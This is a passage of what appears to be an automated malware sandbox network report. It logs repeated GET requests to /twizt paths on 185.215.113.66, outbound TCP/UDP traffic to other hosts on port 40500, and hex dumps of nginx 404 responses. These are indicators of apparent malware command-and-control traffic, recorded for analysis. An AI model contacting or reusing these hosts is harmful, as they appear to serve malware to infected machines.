                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /twizt/3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 185.215.113.66
                          Source: global trafficTCP traffic: 192.168.2.7:49764 -> 176.194.22.84:40500
                          Source: global trafficUDP traffic: 192.168.2.7:57861 -> 105.106.149.0:40500
                          Source: global trafficUDP traffic: 192.168.2.7:57861 -> 89.236.217.87:40500
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:38 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:38 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:39 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:41 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:43 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:44 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 62 61 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 90 31 0b c2 30 10 85 77 c1 ff 70 6e 3a a4 69 a1 83 43 c8 22 0a 0e ba 88 3f 20 f5 ce 36 90 5e 24 a6 60 ff bd a9 b6 20 ce 8e 8e f7 ee 7b 8f c7 53 4d 6c 9d 9e cf 54 43 06 b5 8a 36 3a d2 65 5e c2 d1 47 d8 f9 8e 51 c9 b7 a8 e4 0b 49 68 e5 b1 1f 2c 17 e2 48 41 ab a6 f8 76 24 45 c9 f1 3d 64 27 68 bc b8 b6 fc 90 45 56 ac b3 1c 96 e7 aa e3 d8 ad 3e 59 39 a5 cb a9 d9 42 08 30 70 33 88 96 6b 88 1e d0 de 4d e5 08 0e a7 fd 16 0c 23 6c 9a e0 5b 82 6b b0 c4 e8 7a a0 10 7c 48 8e 9a 40 88 a1 e9 3f e2 97 5b 3c 01 2a b6 49 35 34 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: ba10wpn:iC"? 6^$` {SMlTC6:e^GQIh,HAv$E=d'hEV>Y9B0p3kM#l[kz|H@?[<*I540
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 15 Aug 2022 16:31:48 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 